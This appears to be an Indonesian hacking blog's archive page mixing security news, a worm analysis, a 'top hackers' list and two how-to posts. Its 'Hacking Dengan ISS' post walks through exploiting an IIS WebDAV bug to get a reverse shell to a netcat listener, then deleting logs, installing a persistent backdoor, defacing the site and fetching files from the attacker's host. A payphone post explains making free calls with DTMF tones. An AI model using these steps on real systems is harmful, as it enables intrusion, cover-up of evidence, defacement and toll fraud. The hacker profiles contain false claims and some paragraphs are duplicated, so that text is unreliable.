GOOGLE NEXUS ONE BERHASIL DI HACK
Sistem operasi telepon selular revolusioner Nexus One milik Google, telah di-hack oleh pengguna dari forum Android@MoDaCo. Seorang pengguna bernama Brian telah merilis sebuat boot.img yang ketika di-flash, akan menjadikan root aktif pada saat proses startup, dan sepenuhnya menghilangkan keharusan untuk mem-flash sistem partisi Anda atau mencegah kerusakan, karena memnimpa ROM yang terinstal. Petunjuk bagaimana mem-flash sistem perangkat anda dengan superboot sangat mudah dimengerti. Tentu saja ketika rooting, menjebol atau memodifikasi telepon selular harus mengerti resiko yang akan dihadapi. Jika anda tidak terlalu paham, sebaiknya melakukan penelitian, sebelum menghapus sesuatu dari telepon.
GENG RUSIA DALANG HACKER BANK
Pihak berwenang AS sedang menyelidiki pencurian uang puluhan juta dolar dari Citibank, oleh Hacker yang sebagian besar menggunakan perangkat lunak daru Rusia. Pelanggaran keamanan di bank utama AS mulai terdeteksi pertengahan tahun 2009, berbasiskan lalu lintas data dari alamat internet, yang sebelumnya digunakan oleh geng jaringan bisnis Rusia. Jaringan bisnis Rusia adalah kelompok terkenal yang terkait dengan perangkat lunak berbahaya, hacking, pornografi anak, dan spam. FBI adalah badan yang bertaggung jawab menyelidiki kasus ini. Rumor mengatakan sebuah program yang disebut Black Energy, yang dirancang oleh hacker Rusia, adalah salah satu alat yang digunakan dalam serangan itu. Alat ini dapat digunakan untuk memerintah botnet, atau kelompok besar komputer yang terinfeksi oleh malware, dan dikendalikan oleh seorang hacker, dalam serangan dimaksudkan untuk membuat situs web hancur. Tahun ini, versi modifikasi dari perangkat lunak muncul secara online yang dapat mencuri informasi perbankan.
SISTEM JARINGAN GSM JEBOL
Sistem enkripsi 64 bit dinilai lemah. Sebanyak 3,5 miliar pengguna GSM di seluruh dunia terancam
Selama 21 tahun, algoritma inkripsi yang sama, A5/1, telah digunakan untuk melindungi privasi panggilan di bawah standar GSM. Dengan standar GSM yang mencakup 80% pengguna dari seluruh dunia, jaringan GSM tentu saja dianggap jaringan yang paling aman.
Namun akhirnya, Karnsten Nohl, 28 tahun, peneliti asal Jerman, dilaporkan berhasil memecahkan kode keamanan GSM, dan telah menerbitkan temuannya ke komunitas umum komputer dan elektronik begitupun juga ke grup saya, Hacking For Newbie.
Proses memecahkan algoritma GSM melibatkan bantuan dari 24 anggota Chaos Computer Club di Berlin, yang membantu menghasilkan kombinasi acak yang diperlukan untuk mencoba, dan memproduksi kode book standar atau catatan kombinasi biner berbasiskan bentuk dasar enkripsi A5/1.
Meskipun begitu, Nohl menegaskan bahwa tindakannya tidak ilegal. Nohl mengatakan ia mengambil tindakan pencegahan yang besar untuk memastikan karyanya tetap murni akademis, dan tindakannya itu digunakan untuk memecahkan setiap panggilan telepon digital sebenarnya.
A5/1 adalah sistem algoritma keamanan 64-bit dianggap lemah menurut standar sekarang. Sedangkan algoritma 128-bit dianggap cukup kuat untuk melindungi sebagian besar data.
Selama 21 tahun, algoritma inkripsi yang sama, A5/1, telah digunakan untuk melindungi privasi panggilan di bawah standar GSM. Dengan standar GSM yang mencakup 80% pengguna dari seluruh dunia, jaringan GSM tentu saja dianggap jaringan yang paling aman.
Namun akhirnya, Karnsten Nohl, 28 tahun, peneliti asal Jerman, dilaporkan berhasil memecahkan kode keamanan GSM, dan telah menerbitkan temuannya ke komunitas umum komputer dan elektronik begitupun juga ke grup saya, Hacking For Newbie.
Proses memecahkan algoritma GSM melibatkan bantuan dari 24 anggota Chaos Computer Club di Berlin, yang membantu menghasilkan kombinasi acak yang diperlukan untuk mencoba, dan memproduksi kode book standar atau catatan kombinasi biner berbasiskan bentuk dasar enkripsi A5/1.
Meskipun begitu, Nohl menegaskan bahwa tindakannya tidak ilegal. Nohl mengatakan ia mengambil tindakan pencegahan yang besar untuk memastikan karyanya tetap murni akademis, dan tindakannya itu digunakan untuk memecahkan setiap panggilan telepon digital sebenarnya.
A5/1 adalah sistem algoritma keamanan 64-bit dianggap lemah menurut standar sekarang. Sedangkan algoritma 128-bit dianggap cukup kuat untuk melindungi sebagian besar data.
AMD RADEON HD 5870 EYEFINITY 6
AMD Masih Memperahankan Mahkotanya, Dengan Merilis Video Card Kelas Atas Terbaru
AMD meluncurkan Eyefinity 6, sebuah teknologi yag terdapat di video card Radeon HD 5870, telah dilengkapi dengan 2 GB memory dan 6 display Ports. Menurut AMD, video card tersebut mampu me-rendering lebih dari 1 miliar pixel per detik.
Dengan ATI Radeon HD 5870 Eyefinity 6 Edition, pengguna PC mendapatkan pengalaman komputasi panoramic hanya dengan menggunakan satu video card.
Radeon HD 5870 menggunakan Cypress GPU 880 MHz, digabungkan dengan memory 2 GB GDDR5 1.2 GHz, dan 1600 Stream Processing Unit.
AMD meluncurkan Eyefinity 6, sebuah teknologi yag terdapat di video card Radeon HD 5870, telah dilengkapi dengan 2 GB memory dan 6 display Ports. Menurut AMD, video card tersebut mampu me-rendering lebih dari 1 miliar pixel per detik.
Dengan ATI Radeon HD 5870 Eyefinity 6 Edition, pengguna PC mendapatkan pengalaman komputasi panoramic hanya dengan menggunakan satu video card.
Radeon HD 5870 menggunakan Cypress GPU 880 MHz, digabungkan dengan memory 2 GB GDDR5 1.2 GHz, dan 1600 Stream Processing Unit.
YM-Infocard: Worm Baru Menyerang Yahoo! Messenger
YM-Infocard. Belakangan ini, sebuah worm marak menyebar melalui Yahoo! Messenger (YM). Pada komputer yang terinfeksi, virus akan mengirimkan pesan seperti pada gambar di atas ke seluruh daftar teman, dan pesan tersebut memberikan link yang menarik perhatian pengguna untuk meng-klik-nya. Domain yang tertera pada link dapat bervariasi, tetapi semuanya mengarah ke file image.php. Jika link tersebut di-klik, maka sebuah file bernama IMGXXXXX.JPG-www.myspaces.com.exe akan di-download (XXXXX adalah sederet angka yang juga bervariasi).
Walaupun terdapat konfirmasi apakah ingin mendownload file EXE tersebut, ternyata cukup banyak pengguna yang tidak waspada dan tetap men-download-nya, bahkan menjalankan file tersebut sehingga komputernya ikut menjadi korban.Sampai saat ini, tim PCMAV telah memperoleh 4 (empat) varian YM-Infocard dengan ukuran file berbeda-beda: 73 KB, 99 KB, 103 KB, dan 164 KB. sebuah varian ditulis dengan bahasa pemrograman Visual Basic, dan lainnya dengan FreeBASIC, tanpa di-pack. Icon yang digunakannya adalah icon bertipe image untuk mengecoh pengguna yang dapat mengira file tersebut adalah file gambar.
Walaupun kebanyakan link yang dilaporkan sudah tidak aktif lagi, tetapi tidak tertutup kemungkinan terdapat link-link baru dan varian yang terus menyebar. Dari varian yang sudah ditemukan, salah satu ciri worm ini ialah membuat duplikat dirinya pada WINDOWS\infocard.exe, dan mengaktifkannya di memory, proses ini terlihat pada Task Manager.
Nama file yang diciptakan worm ini adalah infocard.exe atau lnfocard.exe (beda pada huruf pertamanya, huruf “i” dan “l”), tergantung pada jenis variannya. Selain ke folder Windows, YM-Infocard juga menduplikasikan dirinya dengan nama file C:\d.exe, Program Files\lnfocard.exe, juga membuat file Windows\winbrd.jpg, dan file kosong dengan nama Windows\mds.sys dan Windows\mdt.sys.
Penyebaran via YM ini juga pernah dilakukan worm lain seperti Autoit. Walaupun tidak ada efek merusak yang ditimbulkan pada komputer yang terinfeksi, tetapi penyebarannya yang cepat perlu diwaspadai.
Hacking Dengan ISS
1) Pendahuluan
Pertama-tama sebelum melakukan, biar saya jelaskan kepada anda bahwa hacking atau deface menggunakan suatu exploit yang sudah ada di internet hanya akan menjadikan anda seorang lamer atau perusak. Anda seringkali mendapati orang-orang ini melakukan deface terhadap ratusan situs. Nah, mereka ini bukanlah hacker, melainkan script kiddies, karena mereka menggunakan code yang dibuat orang lain untuk mendeface situs. Hacker yang sejati adalah orang yang menciptakan code exploit dalam ‘0 day’. Dan saya sarankan kepada anda agar JANGAN PERNAH MENJADI SCRIPT KIDDIES untuk memperoleh sedikit ketenaran dan merasa bangga dengan hal tersebut!!!
2) Adanya Celah Keamanan
Ok cukup sudah !! Mari dimulai. Pertamakali tujuan kita untuk melakukan penetrasi adalah menemukan suatu hole. Webserver IIS berisikan banyak celah keamanan yang jika dieksploitasi dengan sesuai dapat memberikan seorang hacker kendali penuh atas sistem tersebut. Celah keamanan yang umum adalah buffer overflow, yakni mengeksploitasi format string. Apakah “Buffer Overflow” itu adalah soal yang lain dan memerlukan artikel tersendiri. Atau lebih baik silakan anda baca terbitan Phrack 49 (www.phrack.com) dengan judul “Smashing The Stack For Fun and Profit”. Disana istilah buffer overflow dijelaskan berdasarkan sudut pandang Linux.
Ok, karena webserver IIS menyimpan banyak celah keamanan eksploitasi buffer overflow. Hanya dalam 2 tahun terakhir ini e-eye digital defence team (http://www.eeye.com/) melaporkan adanya buffer overflow pada seluruh ekstensi ISAPI pada IIS Webserver.
Sebagai contoh suatu request
Sekarang, kapanpun webserver iis mendapatkan request berupa file seperti .idq atau .asp dsb selain .html request dipenuhi oleh file .dll yang spesifik pada webserver. Namun jika seorang hacker mengirimkan request berupa string panjang dari aaa dan mencari angka yang tepat dimana suatu buffer overflow terjadi, maka dia dapat menyesuaikan shell code ditempat tersebut dan menyebabkan shell codenya dieksekusi pada remote machine.
Catatan: Suatu shell code merupakan kode assembly yang memberikan command prompt pada Win 2000 dan shell jika pada Linux.
Tapi saat pertanyaan diajukan mengenai hacking website, kita memerlukan penemuan bug sebelumnya. Kaerna kebanyakan server yang dipatch untuk bug yang ditemukan sebelumnya. Pada dasarnya bug .idq ditemukan dua tahun terakhir tidak akan bekerja hari ini karena kebanyakan server Win 2000 telah dipatch dengan service pack sp3, sp4. Jadi saat ini yang kita perlukan adalah bug terakhir atau dalam dunia perhackingan dinamakan dengan “0day exploit”.
Tempat terbaik untuk mencari exploit adalah www.packetstormsecurity.nl, situs ini secara konsisten memuat exploit, code, advisory yang terbaru. Tempat lainnya seperti www.k-otic.com/exploit atau cara terbaik adalah mencari dibagian 0day exploit pada situs kami www.hackersprogrammers.com. Sekarang ini sangat banyak 0day yang sengaja tidak pernah dipublikasikan!!! Dan hanya ditujukan untuk komunitas underground atau orang-orang tertentu yang dikenal sebagai hacker. Untuk mendapatkan exploit yang baik, anda perlu mengadakan kontak dengan hacker yang baik dan berbakat di internet. Dan pilihan terbaik adalah code yang anda buat sendiri (jika anda mampu) maka dengan ini anda mampu menghack berbagai webserver IIS di seluruh dunia!!! J
3) Mengeksploitasi celah keamanan dan Mengendalikan webserver
Ini bagian yang paling menarik. Compile code exploit anda dengan Visual C++ jika berupa kode win c atau gunakan gcc jika berupa kode linux. Jika anda tidak mengetahui hal ini, lebih baik mendownload exploit berbasis GUI dari internet (ini semakin menunjukkan bahwa anda seorang lamer). OK, sekarang sebagai contoh exploit webdave ntdll.dll yang ditemukan 3-4 bulan terakhir. Masih banyaknya server yang vulnerable untuk ini. Terakhir saat salya menuliskan artikel ini ditemukan bug terbaru berupa RPC DCOM oleh LSD. Namun bug RPC DCOM tidak akan bekerja dalam kasus ini karena firewall pada server akan memblok seluruh packet terhadap port 135. Setelah anda melihat-lihat webdave exploit, downloadlah exploit Kralor Webdave. Compile dan download exploit kralor yang berbasis GUI. Shellcode ini berupa jenis yang spesifik. Shellcode yang digunakan exploit Kralor memberikan suatu reverse shell. Artinya setelah berhasil mengeksploitasi server tersebut akan terhubung ke computer anda melalui suatu command shell!!! Jadi anda memerlukan netcat listener untuk ‘mendengar’ port spesifik pada computer anda. Download tool netcat dari internet dan masuk ke DOS prompt, ketik sebagai berikut:
D:\nc>nc -Lvp 6666
Listening on [any] 6666 ….
Well, sekarang computer beraksi sebagai suatu server di port 6666 dan listening terhadap berbagai incoming request. Sekarang compile exploit kralor atau gunakan yang berbasis GUI, kemudian masuk ke DOS prompt dan ketik.
D:\vcproject\webdave\debug>web.exe
[Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]
www.coromputer.net && undernet #coromputer
syntax: D:\WEB.EXE
Cool !!! Jadi apa yang harus anda lakukan? Masih bingung? OK, saya sarankan, jika anda ingin menghack suatu server, carilah ip dengan melakukan ping dari DOS. Misalkan ip 123.123.123.123 dan ip kita 200.200.200.200. Pastikan netcat menjalankan beberapa port seperti 6666 dan ketik perintah pada Dos Prompt yang baru:
D:\vcproject\webdave\debug>web.exe 123.123.123.123 200.200.200.200 6666
Terdapat padding bit yang berbeda. Dalam kasus exploit berbasis GUI dapat melakukannya sendiri, atau membaca kometar dalam exploit tersebut untuk mendapatkan suatu ide mengenai apa padding bit tersebut dan bagaimana cara menggunakannya. Setelah berhasil mengeksploitasi anda akan mendapatkan shell pada netcat listener anda.
D:\nc>nc -Lvp 6666
Listening on [any] 6666 ….
connect to 200.200.200.200 from 123.123.123.123
Microsoft(R) Windows 2000
(C)Copyright Microsoft Corp 1981-2000.
C:\winnt\system32>
Selamat!! Jadi anda berhasil mengeksploitasi bug ntdll.dll pada remote server. Command prompt telah kita dapatkan pada netcat listener yang merupakan command prompt pada remote server.
4) Apa yang harus dilakuklansetelah melakukan hacking suatu server?
Pertama kali yang terpenting yang harus dilakukan setelah melakukan hacking berbagai server di dunia internet adalah menghapus log tersebut. Setelah kita memiliki HTTP Port 80 untuk menghack, kita perlu menghapus log IIS. Direktorinya dalam hal ini ada di
C:\winnt\system32\logfiles .
Jadi pada shell tersebut anda tinggal mengetik.
C:\winnt\system32> rmdir /s /q logfiles
Yang menghapus direktori log file, file dan folder yang terdapat dalam direktori tersebut.
Catatan: Ini merupakan cara yang buruk dalam menghapus file log. Admin dapat langsung mengetahui bahwa seseorang telah menghacking servernya. Cara lain yang terbaik adalah masuk kedalam direktori logfile dan cari file log yang spesifik dan menghapus hanya pada baris ayng berisikan ip anda.
Sekarang, setelah megnhapus log file. Anda dapat bermain-main dengan server tersebut. Seluruh server berada dalam kendali anda. Hal terbaik adalah menginstall suatu backdoor pada server tersebut. Membua backdoor senfiri atau sebagai gantinya mengupload netcat apda server tersebut dan menjadinnya listen pada beberapa port yang spesifik dan anda juga dapat menambahkan entri dalam registri jadi dapat tetap dalam keadaan listening bahkan setelah server tersebut direstart.
Langkah berikutnya, misalkan anda ingin mendeface situs tersebut, maka carilah direktori webrootnya. Direktori default biasanya adalah C:\inetpub\wwwroot, disana anda akan menemukan file seperti index.html, index.asp, default.html dan file-file lain seperti itu. Jika ada, maka anda sudah berada pada direktori yang dimaksud. Sekarang tinggal membackup file index.html nya. Perintahnya adalah sebagai berikut:
C:\inetpub\wwwroot> copy index.html indexold.html
C:\inetpub\wwwroot> echo defaced by Chintan Trivedi > index.html
Wah !! Akhirnya anda berhasil mendeface situs tersebut. Jika anda ingin mengupload file anda sendiri ke server tersebut, maka anda harus memiliki TFTP server pada sistem anda. Jalankan dan ketik ketik perintah remote shell berikut:
C:\inetpub\wwwroot> tftp 200.200.200.200 GET index.html
Perintah ini akan mengupload file index.html anda ke web server. Oh ya, contoh diatas dengan anggapan 200.200.200.200 menjadi ip anda. Dan ingatlah mengenai satu hal penting. Webdave exploit dapat menyebabkan crash pada server IIS. Jadi situs tidak akan terbuka dan anda tidak dapat melihat halaman yang terdeface L Jangan khawatir, ada cara untuk merestart IIS pada remote system tersebut, yaitu:
C:\inetpub\wwwroot> iisreset /restart /rebootonerror /timeout:100
Tunggulah sebentar dan bukalah situs tersebut, misalnya www.target.com dan lihat halaman yang telah anda deface!!! Nah ini semua hanyalah satu contoh hacking webserver menggunakan webdave exploit. Terus memperbarui sesi 0day anda di www.hackersprogrammers.com dengan 0day exploit terbaru. Setiap exploit bekerja dengan caranya masing-masing. Anda dapat melihat penjelasan yang tersedia pada exploit tersebut jika anda bukan seorang script kiddie.
5) Kesimpulan
Hal yang perlu saya katakan kepada anda bahwa hacking atau mendeface melalui exploit ‘siap-pakai’ yang tersedia di internet adalah tindakan merusak. Janganlah dilakukan terus menerus. Melakukan hacking suatu server hanya jika anda memang memiliki alasan kuat untuk melakukannya dan anda benar-benar mengetahui apa yang sedang anda lakukan. Jika anda melakukan hacking secara membabi-buta anda hanya akan menyebabkan berbagai kerusakan, kebencian dan tidak memahami bagaimana dunia ini bekerja.
Dan untuk admin: jika anda ingin melindungi server anda dari hacker, maka langkah terbaik adalah tetap mengupdate dengan service pack terakhir yang disediakan oleh Microsoft. Kedua, kapanpun server anda dihack atau terdeface, silakan periksa pada sistem anda, apakah telah terinstall backdoor, rootkit. Kalau ada, hapuslah. Ketiga menjaga direktori file log dari seseorang yang tidak berhak. IIS menyediakan fasilitas untuk mengubah direktori file log. Tapi dalam berbagai kasus, tetap saja pencegahan jauh lebih baik daripada penyembuhan.
Hack Photo Private di Facebook
Nama 10 Hacker Terbaik
Didunia IT dikenal beberapa orang yang memiliki kemampuan lebih dalam mengelola dan menembus suatu sistem jaringan jaringan keamanan . Mereka dikelompokkan menjadi beberapa jenis, nah disini saya hanya akan menjelaskan dari 2 golongan yaitu black hat hacker dan white hat hacker.Golongan Black Hat Hacker lebih sering disebut dengan Cracker . Nah dibawah ini ada profil dari 5 orang cracker yang memiliki catatan kriminal yang cukup banyak dan termasuk cracker top dunia:
Jonathan JamesJames mendapatkan reputasi buruk ketika ia menjadi remaja yang harus mendekam di penjara karena melakukan hacking pada saat berumur 16 tahun.saat di interogasi ia hanya menjawab bahwa ia melakukan cracking dengan motif bermain-main dan ia berkata bahwa ia sangat merasa puas apabila ia dapat masuk ke dalam suatu jaringan keamanan. Gangguan utama Jonathan James ditujukan kepada organisasi tingkat tinggi.ia melakukan cracking dengan cara menginstall suatu backdoor ( kalau gak tau cari di google ) kedalam server organisasi DTRA ( suatu organisasi keamanan di Amerika Serikat ).tujuan dia menginstall backdoor adalah untuk mengetahui setiap arus komunikasi yang masuk dan keluar serta melihat email dan user dan password pegawainya.James juga melakukan cracking terhadap komputer NASA dan mencuri software bernilai 1,7 juta dollar. kegiatannya ini mengakibatkan NASA harus mematikan sistem komputernya dan merugi sekitar 41.000 dollar. Kata James, dia dapat melakukan ini ketika belajar pemrograman C.( salah satu jenis pemrograman )Akhirnya ia dijatuhi hukuman tahanan rumah selama 6 bulan dan 6 bulan bebas bersyarat, selain itu ia juga dilarang memakai komputer hingga masa hukumannya berakhir.Tapi sekarang ia telah menyelesaikan studinya dan menjadi pegawai di salah satu perusahaan keamanan komputer di Amerika.
Adrian Lamo, terkenal karena ia mengklaim telah berhasil masuk dalam sistem keamanan "New York Times" dan "Microsoft". dia dijuluki sebagai Tunawisma Cracker karena ia melakukan cracking dengan cara menggunakan internet di fasilitas umum seperti warung kopi dan perpustakaan.Dalam kegiatan crackingnya, ia selalu melakukan pengujian penetrasi, ketika ia menemukan celah keamanan, ia akan masuk dan berusaha melakukan ekssploitasi.Sejauh ini ia berhasil melakukannya pada Yahoo!, Bank of America, Citigroup dan Cingular.Ia berhasil merusak jaringan komputer di "The New York Times" dan mengakibatkan hal yang serius.Ia juga mengcrack akun dari perusahaan pemberitaan "The Times Lexis Nexis".Ahirnya ia dipenjara selama 2 tahun dan 6 bulan tahanan rumah serta denda sebesar 65.000 dollar.Setelah ia bebas pada Januari 2007 akhirnya ia bekerja menjadi seorang wartawan dan pembicara.
Kevin Mitnick, adalah seorang hacker dengan reputasi tertinggi di dunia.ia disebut-sebut sebagai hacker multi-talenta, tindakan kriminal pertamanya, ia berhasil melakukan cracking terhadap kartu bis di LOs Angeles sehingga ia dapat naik bis dengan gratis,ia juga melakukan kejahatan lainnya yaitu penyusupan jaringan komputer, cracking jaringan telepon, pencurian software dan data2 penting perusahaan serta yang paling parah ia berhasil melakukan pengrusakan terhadap jaringan peringatan keamanan negara Amerika Serikat. Maka tak heran apabila dia dijuluki sebagai kriminal komputer paling di cari Di Amerika Serikat. Aksi Kevin Mitnick ahirnya usai setelah ia berhasil di lacak leh hacker asal Jepang, Tsutomu Shimomura dan ditangkap serta dijebloskan ke dalam penjara beberapa tahun.Setelah bebas, ia mendirikan perusahaan konsultan keamanan yang diberi nama "Kevin Mitnick computer security consultant"
Kevin Poulsen, termasuk cracker top dunia, poulsen memiliki keahlian cracking terhadap sistem komunikasi dan telepon.Ia beberapa kali berhasil mengcrack radio amerika "KISS FM". Ia juga berhasil mencuri database FBI dan Yellow Pages.Ia pun pernah membuat crash sistem komunikasi telepon di beberapa kota di Amerika Serikat.Sekarang Ia bekerja sebagai jurnalis dan ia bekerja di MySpace sebagai penyaring konten porno di salah satu situs jejaring sosial dunia itu.Robert Tappan MorrisCracker yang satu ini tidak kalah terkenalnya, ia terkenal sebagai pencipta "Worm" pertama di dunia yang hingga sekarang sangat meresahkan pengguna komputer di dunia.Dia menciptakan Worm saat sedang belajar Cornell. Pada awalnya Worm ciptaannya mampu menginfeksi lebih dari 6000 komputer dan membuat jaringan komunikasi mati dalam sekejap. Namun sekarang ia berhenti dan menjadi proffesor di MIT company, perusahaan riset dan pengembangan komputer serta pembuatan jaringan nirkabel yang sekarang lebih populer dengan nama wireless.Kalau yang dibawah termasuk White Hat Hacker yaitu hacker yang bersifat konstuktif atau membangun karena mereka melakukan riset dan pengembangan IT.Setiap orang di bawah ini juga sering mendapat penghargaan atas jasa mereka didunia IT.
Dibawah ini adalah profil dari 5 orang white hat hacker:
Stephen Wozniak, termasuk salah satu hacker pendiri Apple, ia berhasil mengembangkan beberapa teknologi dalam sistem jaringan.Contohnya ia berhasil membuat switch yang dapat memaksimalkan kinerja jaringan komputer dan ia juga sedang melakukan riset terhadap beberapa prototype. Ia juga beberapa kali mendapatkan penghargaan diantaranya Medali Nasional Teknologi serta gelar doktor kehormatan dari Kettering University dan Nova Southeastern University.Sekarang ia bekerja sebagai pengajar di Los Gatos School.
Tim Berners-LeeTim Barners-Lee, terkenal sebagai penemu World Wide Web. Ia juga dikenal sebagai pembuat komputer elektronik pertama di dunia.Ia juga mengembangkan beberapa Hypertext Prototype saat ia bekerja di perusahaan nuklir untuk kemudahan sharing data.
Linus Torvalds, terkenal sebagai pengembang Unix dan LInux, salah satu Sistem Operasi yang dipakai masyarakat dunia. Dia membangun komputer pertamanya dengan nama Commodore VIC-20 dan Sinclair QL dengan sistem pengoprasian teks editor.Sekarang ia bekerja sebagai pemimpin Linux.corpRichard Stallman Salah satu pencipta software-software di dunia sehingga dikenal dengan "Bapak Pencipta Software".
Hack Telpon Umum
Hah, aneh bener judulnya, emang hari gini masih pake telepon umum?? jamannya Hp boss.weh, jangan salah telepon umum sampai saat ini masih diandalkan sebagai sarana telepon paling efektif buat masyarakat umum.Tapi sekarang saya gak bahas itu, kali ini saya akan bagi2 ilmu cara hack telepon umum biar gratis jadi gak perlu masukkan koin.Sebenarnya cara ini tidak sengaja saya temukan ketika saya sedang nonton film hacker"Take Down", itu loh film dari kisah nyata antara Kevin mitnick sama Tsutomu imamura.Ketika itu adegannya Kevin Mitnick sedang berusaha menelepon rekannya lewat telepon umum tetapi ia bokek akhirnya ia melakukan hal ini:
Siapkan sebuah hape classic ( nggak juga nggak apa2) yang penting bunyikan suara tombolnya, dan settinglah dengan bunyi classic ( ituloh kayak telepon jaman dulu yang bunyinya tit,tat,tit,tut)Coba perhatikan bahwa setiap tombol punya bunyi yang khas.
Arahkan speaker Hpmu ke arah mikrofon telepon umum
Kemudian pencet no telepon yang kamu tuju.( pencet no telepon yang kamu tuju di Hpmu trus kan suara tombolnya masuk ke mikrofon telepon umum.
Tunggu beberapa saat nanti telepon umum itu akan mereply dan langsung deh bunyi tut,tut,tut. Itu artinya kamu sudah terhubung dengan no telepon tujuan.Cara ini sudah saya coba dan walhasil saya bisa telepon bibi saya lewat telepon umum SEPUASNYA dan dijamin GRATIS,TIS,TIS !!!Tunggu postingan saya selanjutnya yang lebih menarik OK !!!!
Langganan:
Postingan (Atom)